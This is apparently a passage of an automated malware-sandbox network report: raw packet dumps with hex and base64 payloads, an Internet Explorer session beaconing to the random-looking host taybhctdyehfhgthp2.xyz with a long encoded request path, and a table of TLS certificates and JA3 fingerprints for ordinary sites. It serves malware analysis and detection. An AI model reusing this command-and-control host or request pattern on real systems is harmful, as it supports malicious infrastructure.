Jul 6, 2021 14:31:11.434838057 CEST	11790	IN	Data Raw: 6c 78 63 44 32 47 56 63 61 36 54 4d 71 37 71 45 4a 45 6c 61 34 2b 50 55 76 34 6f 56 47 72 2f 78 32 67 77 72 79 32 69 75 4f 69 67 35 4f 36 2b 72 59 31 6e 53 34 46 74 79 61 54 71 5a 43 48 76 6f 31 6f 78 41 6f 43 36 32 44 62 48 4f 33 50 33 30 42 4c Data Ascii: lxcD2GVca6TMq7qEJEla4+PUv4oVGr/x2gwry2iuOig5O6+rY1nS4FtyaTqZCHvo1oxAoC62DbHO3P30BLghab//RvG9hkoVKtvUlf1dUfd/hFWNGLhQz9wnvaRsWtj0TveHk1mxLCbBq9qT9iZKYtFlcANnmzhxYXKJr7Qh7YnL3wanaF8xRzB0cBHcnYqzEDKRn/+h5NzRMklbkLP9dcsrxNWX2E8FgZrNX99blk+rAt+eSJy
Jul 6, 2021 14:31:11.434854031 CEST	11791	IN	Data Raw: 67 54 58 34 34 41 75 50 4d 36 34 66 56 45 49 4c 78 54 56 49 32 68 78 59 37 4e 44 62 68 6e 53 6d 65 44 70 61 33 65 77 44 38 30 44 33 6c 50 35 72 4f 68 6b 68 38 6e 42 30 67 62 64 35 42 4a 37 72 44 49 73 45 59 72 71 74 4a 72 6b 72 30 74 58 49 33 66 Data Ascii: gTX44AuPM64fVEILxTVI2hxY7NDbhnSmeDpa3ewD80D3lP5rOhkh8nB0gbd5BJ7rDIsEYrqtJrkr0tXI3f76TkOqKK8+XfqzUd6WsZvh07ElCb+UyD65n8N+NDwGOIwt/xp7rtZuunoVrkz+e1KZEHYuxlDgISMWMU3OBX4KOqL3C5T0V//4eYYBcIhnBaag/I9/pQwUJfr4KXB3N4p3P4Pf5cg0+SUGiD0GqNIP/wC1QaLUQrl
Jul 6, 2021 14:31:11.434976101 CEST	11793	IN	Data Raw: 45 6c 4b 71 41 61 43 7a 64 4f 33 64 33 4f 48 73 46 6f 4d 58 4d 51 73 2b 38 64 35 2f 46 78 39 5a 6d 64 71 41 62 75 2f 4a 68 4b 44 48 32 47 31 34 49 36 6f 76 51 58 70 6b 42 34 67 6f 44 65 4b 6c 5a 6e 65 4c 34 4c 48 47 4e 73 57 57 54 46 51 38 64 75 Data Ascii: ElKqAaCzdO3d3OHsFoMXMQs+8d5/Fx9ZmdqAbu/JhKDH2G14I6ovQXpkB4goDeKlZneL4LHGNsWWTFQ8dunZX+zXvxtQ8ZIAm0RdtWSPfmU8H+MqIfvLRq17/X8IWIo73/Oyi0zVXeSHJooo40JIzxNxmboREY/8lyErZvgDhHbXcwmys/MUghOhvpwwlDUkoJTQm+e0YcHyMIMgbBHIPDEIODzlqZ2aYLk/HCSx8zq/DZoODWj
Jul 6, 2021 14:31:11.434993029 CEST	11794	IN	Data Raw: 57 72 79 52 45 2f 4e 30 2b 6b 61 72 77 56 48 45 6e 70 69 5a 63 7a 6a 67 74 51 57 32 7a 4d 46 48 47 50 50 74 33 7a 37 61 65 77 30 46 4c 34 62 68 39 72 44 2b 54 4d 54 69 32 77 54 5a 55 6c 48 4e 4c 41 58 35 4f 72 48 43 78 30 50 4c 54 71 6c 6e 71 41 Data Ascii: WryRE/N0+karwVHEnpiZczjgtQW2zMFHGPPt3z7aew0FL4bh9rD+TMTi2wTZUlHNLAX5OrHCx0PLTqlnqAcOxSiHPN5MS9hyi9JwrV21NTuZkOPBH1kMSxOBiyxgJZmX6M1UvFBNjBmXFjA0yY5hFM9fvaMDA9Bxv6ETkIJbBkoUgzm7hStpnLWD/YBoE30sWHD+WiHtcVoaupUe5XusTrWI1wf4fwK8j3RhESxHcHX8CZb+lED
Jul 6, 2021 14:31:11.435004950 CEST	11796	IN	Data Raw: 35 5a 2b 43 4e 37 6d 73 6b 48 7a 70 79 50 44 4e 75 4c 68 67 48 31 59 44 45 47 65 69 4c 68 32 78 52 48 56 35 78 48 45 48 71 41 35 4e 56 4b 79 38 67 32 35 4e 66 66 6c 36 63 46 6d 4e 56 6f 42 4c 70 30 32 35 73 62 6f 73 61 63 36 75 48 36 6e 4b 39 44 Data Ascii: 5Z+CN7mskHzpyPDNuLhgH1YDEGeiLh2xRHV5xHEHqA5NVKy8g25Nffl6cFmNVoBLp025sbosac6uH6nK9DkEdHaDceK3scDeDcd1bZUYoO/j5tMgB1kOHdsIHILi6/hnW5ceouM8zuyDaL4W/lcEvDLTQucCFvZ7G1XL7fytejcD//xlHJ2EV6QXWLAyFaS2cj1+UgqRmDMtKlBZW16nCYDOdopSItXMfBJVDovsIe4t7xpu/tA
Jul 6, 2021 14:31:11.435020924 CEST	11797	IN	Data Raw: 44 36 71 66 30 6b 75 4e 46 68 4c 75 63 4a 2b 30 50 43 36 74 35 67 6e 5a 34 42 46 45 41 33 58 71 74 4e 31 4e 37 59 49 75 39 48 5a 4b 73 62 39 57 38 72 37 34 30 4a 77 56 6d 55 4b 6d 41 58 66 6e 36 67 62 57 33 6a 57 61 45 4b 71 5a 35 55 4a 35 62 35 Data Ascii: D6qf0kuNFhLucJ+0PC6t5gnZ4BFEA3XqtN1N7YIu9HZKsb9W8r740JwVmUKmAXfn6gbW3jWaEKqZ5UJ5b589F+hAD4qCwoqpOfGiRUsPZOXquWknnUPMh/UMxkG5XygSNHPIlPQf0KBO59FwzPCWCqvM8qAy7JqBzAmwQs0OYppXZCvZM69UaT929q8e42bBdTt5kbfi96lQ7k5soBqFf3veVQEajzauWHinoVxqRJi+OSRAHse
Jul 6, 2021 14:31:11.435034990 CEST	11798	IN	Data Raw: 6a 72 4c 46 44 76 4e 4b 67 6a 49 42 33 76 4e 61 4e 36 4c 7a 6a 59 41 55 64 67 39 6a 39 6d 30 54 68 34 74 4b 2b 73 4d 57 65 43 6e 48 50 42 6c 54 43 7a 77 42 54 79 33 64 72 34 5a 71 37 75 45 66 32 67 54 33 57 61 58 2b 75 51 44 33 31 75 7a 6e 46 39 Data Ascii: jrLFDvNKgjIB3vNaN6LzjYAUdg9j9m0Th4tK+sMWeCnHPBlTCzwBTy3dr4Zq7uEf2gT3WaX+uQD31uznF9UOsircDJQANKO0d82TKV+OaPW/0az5prwH1r3kFXPHqb3YZFmRfocn21t36MUXYNaFR+k14L7CRuWnfSZxkSxAQGsxXtxFOvMPuDSXa+bq4SRZV4kPJQDKUTiCGi8dwdtCnteI2zM+eMz6+TKJalUkPlWkfdZm5gQ
Jul 6, 2021 14:31:11.435190916 CEST	11800	IN	Data Raw: 49 6b 4c 6f 52 4a 67 6d 69 7a 63 64 34 69 36 47 4e 66 71 44 79 38 47 58 79 4c 48 4a 43 71 64 31 73 61 63 4f 32 51 76 77 62 58 59 78 44 4c 38 52 54 53 4c 44 68 7a 2f 4a 55 6b 70 4f 42 35 47 32 44 65 4a 6d 4a 75 38 61 42 72 66 4d 6d 73 33 38 34 53 Data Ascii: IkLoRJgmizcd4i6GNfqDy8GXyLHJCqd1sacO2QvwbXYxDL8RTSLDhz/JUkpOB5G2DeJmJu8aBrfMms384SXz5cBHV5i5Ba+8kAifi1l9/0Dg/MfoeaDzlhOk+o9g49hr/JBwAWj3HoiQowJfLcDm9Elomg8pODpgexMW9sXcUymehnqGz9G1zxS79+sdD4IP8wPtQmEnYLbxtID/Fl09Xn5abf73KLV31gWDkr0OJ20EDwcWczK
Jul 6, 2021 14:31:11.435208082 CEST	11801	IN	Data Raw: 65 74 7a 49 68 35 67 59 63 70 66 57 2f 48 4c 33 63 67 41 36 44 61 72 4e 53 56 75 6d 72 6b 59 67 50 51 44 45 51 36 79 4e 79 68 44 5a 50 64 55 6a 48 61 4d 6d 42 4f 2b 30 47 69 6a 53 51 39 5a 50 69 46 63 68 48 66 36 51 61 70 63 69 53 70 49 45 31 42 Data Ascii: etzIh5gYcpfW/HL3cgA6DarNSVumrkYgPQDEQ6yNyhDZPdUjHaMmBO+0GijSQ9ZPiFchHf6QapciSpIE1BxMU55qQm1QwQKY1xGtx9wSooSO1eApcBb2SybgCzjEfTJoYm2GoxBt+g5E7vxPfCX8Lz2KXylMKTD8bTn2zf2VU/pZtu8FDBW+CahSAvMKto5T+CXe4XUKbcebC1DkR1RUIEntenwJoIob30WZRkvqaWDDKmQLLZp
Jul 6, 2021 14:31:11.472871065 CEST	11803	IN	Data Raw: 64 48 44 76 77 46 55 30 39 77 51 59 54 50 48 6d 64 37 7a 49 58 78 36 74 5a 2b 64 68 6e 4c 4b 70 71 64 6f 51 6c 4a 52 45 50 55 54 43 53 42 61 62 67 50 6b 54 6f 66 79 47 32 61 45 4a 6c 6a 67 68 55 42 5a 57 49 49 52 68 49 4a 71 74 34 63 63 68 77 2f Data Ascii: dHDvwFU09wQYTPHmd7zIXx6tZ+dhnLKpqdoQlJREPUTCSBabgPkTofyG2aEJljghUBZWIIRhIJqt4cchw/qm5g4a34BSbj4qhHspzEAyAtjrK+do97NxAKp0nqqq2kMkdEnNw/LpCY396nFbN8Er0Uh113nBF8rYBZ44JUxy0z/QwOWlAtc1pmui9lyIe2de+SXTIL5voydZlgmZ3tssMh1Bims6Ee/BcLLq6HkHE1ZOP3nrmKs

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49888	45.90.58.179	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 14:31:14.488343000 CEST	12155	OUT	GET /jdraw/SeHkUEUxsMZP1AhS/3IlboRjollxufxg/k0C1fYozGaNykNILuY/7mbt1CT39/8yuLSdKM2t03HpRX2_2F/fjGqyiYIkzVmY7BL2T3/lJeut6ngXNw7Xsle3Ac_2F/uCeLuklVXJGPS/OHU0EBrz/suKxF4Ft_2BK7qPRfzoyHnN/GhDiNtOZSu/bj6BgaSC_2FhnYL1W/3sMLu_2F/RiRf.crw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: taybhctdyehfhgthp2.xyz Connection: Keep-Alive Cookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Jul 6, 2021 14:31:14.547493935 CEST	12157	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 12:31:14 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2460 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 65 68 58 6c 64 53 77 58 51 69 59 4c 61 47 7a 6e 51 4e 35 59 46 37 72 33 4c 2f 65 66 4f 4c 62 34 4c 6e 5a 31 6f 41 59 70 74 38 6c 67 50 47 50 65 2f 67 66 38 2f 44 47 54 62 56 36 6d 37 59 77 70 55 52 33 4d 57 6f 32 55 74 4b 64 44 6d 46 34 41 50 43 46 72 61 4a 52 45 77 6c 4a 57 6e 6b 6f 62 38 53 73 51 4e 4a 68 72 79 77 76 4b 71 77 2b 62 53 6f 6f 48 59 75 77 6c 49 42 6b 6e 4f 64 73 70 58 39 45 51 65 33 53 76 39 65 2b 4d 4a 47 7a 42 55 56 30 68 61 45 44 62 61 30 58 41 6b 4f 62 75 44 59 4e 52 6a 31 38 78 6e 4e 69 58 69 36 57 73 36 30 50 6a 63 30 2f 48 55 30 69 39 62 4c 52 70 52 67 35 39 53 54 6b 55 71 46 47 73 38 43 34 31 32 48 31 78 56 64 6d 63 35 64 32 76 72 72 77 31 57 37 32 36 78 64 78 4c 4a 62 42 35 50 72 59 69 50 6f 4d 41 50 31 59 4e 39 50 2b 4b 59 7a 6d 6c 4f 56 47 4b 65 49 76 66 69 4b 79 64 4e 37 61 78 79 55 71 35 2f 77 70 67 41 53 47 2b 2f 30 71 4f 41 61 30 6f 65 53 68 35 51 36 7a 34 4c 65 39 31 58 37 6f 34 32 6a 6d 4f 51 6e 69 53 77 63 2f 41 6e 59 66 6c 6c 67 45 4c 2b 58 5a 2f 69 6f 55 59 4e 69 62 4a 56 6f 58 44 36 65 69 58 4f 6c 37 4d 4f 4b 61 70 79 31 42 62 2b 47 79 77 7a 79 38 74 50 5a 6a 34 54 6b 7a 4f 67 2f 6b 44 6f 6c 43 7a 6d 4b 73 33 50 75 62 48 4c 41 42 34 65 6a 51 45 44 2f 38 66 51 51 6b 46 71 39 50 41 69 59 78 75 70 44 6e 55 69 43 58 67 39 37 76 41 51 42 75 53 4a 73 46 6a 39 6b 37 53 62 51 66 35 6c 72 55 46 54 32 39 6f 50 58 57 41 46 4f 2b 69 76 49 39 54 4c 56 53 36 47 4d 35 56 31 56 51 37 33 4a 46 7a 34 30 48 38 57 35 6a 33 6d 4b 44 73 2b 4c 6b 39 2f 79 70 4e 53 51 52 62 45 41 69 74 6d 49 30 4c 36 39 76 2f 4f 70 79 43 5a 66 77 32 62 4c 72 33 55 4d 6a 79 51 36 6a 63 34 37 32 75 52 54 42 6a 6c 75 6b 74 59 75 4a 4b 74 4f 78 6d 6c 30 6b 46 61 4d 35 4f 51 48 61 6e 43 4b 55 46 55 44 30 5a 45 72 34 31 4f 62 4d 48 67 66 54 4c 41 2b 47 56 51 41 43 32 4d 34 69 36 6f 52 58 62 33 2f 46 44 37 4f 37 71 36 49 71 6e 75 6e 55 33 57 36 78 6f 36 46 6b 6b 77 78 4d 77 46 61 39 33 54 7a 62 49 35 6c 55 36 75 59 6e 59 2b 6b 4c 59 52 51 62 79 54 46 56 33 5a 6d 49 70 4e 70 75 2f 74 7a 50 41 32 5a 41 6b 4e 32 53 4a 74 61 54 66 4d 4f 62 71 67 57 65 69 49 56 57 5a 44 49 36 59 5a 34 50 65 6f 59 56 47 56 50 54 78 56 6f 39 7a 56 57 65 35 58 36 7a 51 72 71 57 43 47 47 45 69 77 4c 5a 51 4c 45 78 76 6a 63 76 4a 35 2b 55 6c 77 36 4a 57 38 73 32 39 73 37 34 6b 63 38 56 6f 42 78 30 68 74 36 57 56 64 70 62 59 30 30 63 44 66 76 5a 6c 71 50 5a 45 79 44 6a 75 54 68 38 30 67 77 61 4d 30 52 54 67 69 31 79 61 78 2f 44 41 4b 34 30 63 59 37 57 6e 72 64 2f 53 6e 66 64 30 6d 51 68 62 65 6d 48 32 6d 63 73 53 43 45 44 6c 56 32 47 69 59 50 6c 46 6e 6f 6a 7a 38 56 79 53 52 7a 5a 75 42 34 39 6e 6a 76 38 54 76 72 69 37 48 65 57 53 52 6e 49 33 73 47 51 76 45 6a 37 42 4c 33 54 48 55 48 2f 4e 48 58 51 4c 45 4e 4f 71 5a 6b 49 63 78 4a 51 43 71 78 4c 48 6a 6f 66 61 58 65 47 4c 38 64 49 49 52 45 32 4a 32 33 63 4b 4e 72 2f 32 56 34 74 63 66 44 79 31 52 59 4a 2b 2b 6d 74 Data Ascii: ehXldSwXQiYLaGznQN5YF7r3L/efOLb4LnZ1oAYpt8lgPGPe/gf8/DGTbV6m7YwpUR3MWo2UtKdDmF4APCFraJREwlJWnkob8SsQNJhrywvKqw+bSooHYuwlIBknOdspX9EQe3Sv9e+MJGzBUV0haEDba0XAkObuDYNRj18xnNiXi6Ws60Pjc0/HU0i9bLRpRg59STkUqFGs8C412H1xVdmc5d2vrrw1W726xdxLJbB5PrYiPoMAP1YN9P+KYzmlOVGKeIvfiKydN7axyUq5/wpgASG+/0qOAa0oeSh5Q6z4Le91X7o42jmOQniSwc/AnYfllgEL+XZ/ioUYNibJVoXD6eiXOl7MOKapy1Bb+Gywzy8tPZj4TkzOg/kDolCzmKs3PubHLAB4ejQED/8fQQkFq9PAiYxupDnUiCXg97vAQBuSJsFj9k7SbQf5lrUFT29oPXWAFO+ivI9TLVS6GM5V1VQ73JFz40H8W5j3mKDs+Lk9/ypNSQRbEAitmI0L69v/OpyCZfw2bLr3UMjyQ6jc472uRTBjluktYuJKtOxml0kFaM5OQHanCKUFUD0ZEr41ObMHgfTLA+GVQAC2M4i6oRXb3/FD7O7q6IqnunU3W6xo6FkkwxMwFa93TzbI5lU6uYnY+kLYRQbyTFV3ZmIpNpu/tzPA2ZAkN2SJtaTfMObqgWeiIVWZDI6YZ4PeoYVGVPTxVo9zVWe5X6zQrqWCGGEiwLZQLExvjcvJ5+Ulw6JW8s29s74kc8VoBx0ht6WVdpbY00cDfvZlqPZEyDjuTh80gwaM0RTgi1yax/DAK40cY7Wnrd/Snfd0mQhbemH2mcsSCEDlV2GiYPlFnojz8VySRzZuB49njv8Tvri7HeWSRnI3sGQvEj7BL3THUH/NHXQLENOqZkIcxJQCqxLHjofaXeGL8dIIRE2J23cKNr/2V4tcfDy1RYJ++mt
Jul 6, 2021 14:31:14.547513008 CEST	12158	IN	Data Raw: 2f 6d 64 72 5a 4a 47 75 36 31 4b 37 74 5a 74 30 79 51 6c 58 53 37 4b 38 53 4b 74 6e 45 4a 6a 65 69 7a 6b 69 59 77 63 42 30 55 65 5a 56 6c 67 71 65 6f 31 2f 38 6b 75 56 41 30 4e 6a 54 76 47 4d 4e 32 33 46 43 2b 4d 33 69 6c 31 54 38 6e 37 5a 4b 63 Data Ascii: /mdrZJGu61K7tZt0yQlXS7K8SKtnEJjeizkiYwcB0UeZVlgqeo1/8kuVA0NjTvGMN23FC+M3il1T8n7ZKc44+djUayVI/op4pJ2ho/CgevvltNpiydA977+rhfW6qecYF914GIkD9lL43w6g+RXlEv+VNofGPOWkUwHp7NgmX1EkmzF5VnbiLDzjYsV2HAvW2rLUmnY3H25wJTXtvITM/t3mZlF6iCRMebU+R8vWKKFlRWRZp5A
Jul 6, 2021 14:31:14.547521114 CEST	12158	IN	Data Raw: 57 6b 45 72 38 4a 4f 4a 6e 52 57 51 4b 52 50 6b 73 42 78 6b 30 2f 4b 57 6b 6b 66 68 34 72 47 33 2f 78 55 75 6f 43 47 55 6b 6e 79 46 59 5a 77 6f 68 4f 68 6a 31 6f 50 4d 34 52 45 51 71 30 68 33 42 71 41 6c 79 77 69 7a 4c 76 65 70 56 63 41 47 57 4b Data Ascii: WkEr8JOJnRWQKRPksBxk0/KWkkfh4rG3/xUuoCGUknyFYZwohOhj1oPM4REQq0h3BqAlywizLvepVcAGWKJApsZZyB9AscV1drNtOwZXQUFcZy2nBHw6ngXHL/FywHGyCnITp2zY1z6Rxv1cXaqlTP6cdmRpLZyx3g=

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jul 6, 2021 14:29:41.479326010 CEST	104.20.185.68	443	192.168.2.4	49745	CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:41.479326010 CEST	104.20.185.68	443	192.168.2.4	49745	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:41.481193066 CEST	104.20.185.68	443	192.168.2.4	49746	CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:41.481193066 CEST	104.20.185.68	443	192.168.2.4	49746	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:45.682502031 CEST	87.248.118.22	443	192.168.2.4	49762	CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Jun 23 02:00:00 CEST 2021 Tue Oct 22 14:00:00 CEST 2013	Thu Aug 05 01:59:59 CEST 2021 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:45.682502031 CEST	87.248.118.22	443	192.168.2.4	49762	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:45.682821989 CEST	87.248.118.22	443	192.168.2.4	49761	CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Jun 23 02:00:00 CEST 2021 Tue Oct 22 14:00:00 CEST 2013	Thu Aug 05 01:59:59 CEST 2021 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:45.682821989 CEST	87.248.118.22	443	192.168.2.4	49761	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:45.696641922 CEST	151.101.1.44	443	192.168.2.4	49763	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:45.696641922 CEST	151.101.1.44	443	192.168.2.4	49763	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:45.698369980 CEST	151.101.1.44	443	192.168.2.4	49764	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:45.698369980 CEST	151.101.1.44	443	192.168.2.4	49764	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:45.699369907 CEST	151.101.1.44	443	192.168.2.4	49765	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:45.699369907 CEST	151.101.1.44	443	192.168.2.4	49765	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:45.700622082 CEST	151.101.1.44	443	192.168.2.4	49766	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:45.700622082 CEST	151.101.1.44	443	192.168.2.4	49766	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:45.701400995 CEST	151.101.1.44	443	192.168.2.4	49768	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jul 6, 2021 14:29:45.701400995 CEST	151.101.1.44	443	192.168.2.4	49768	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
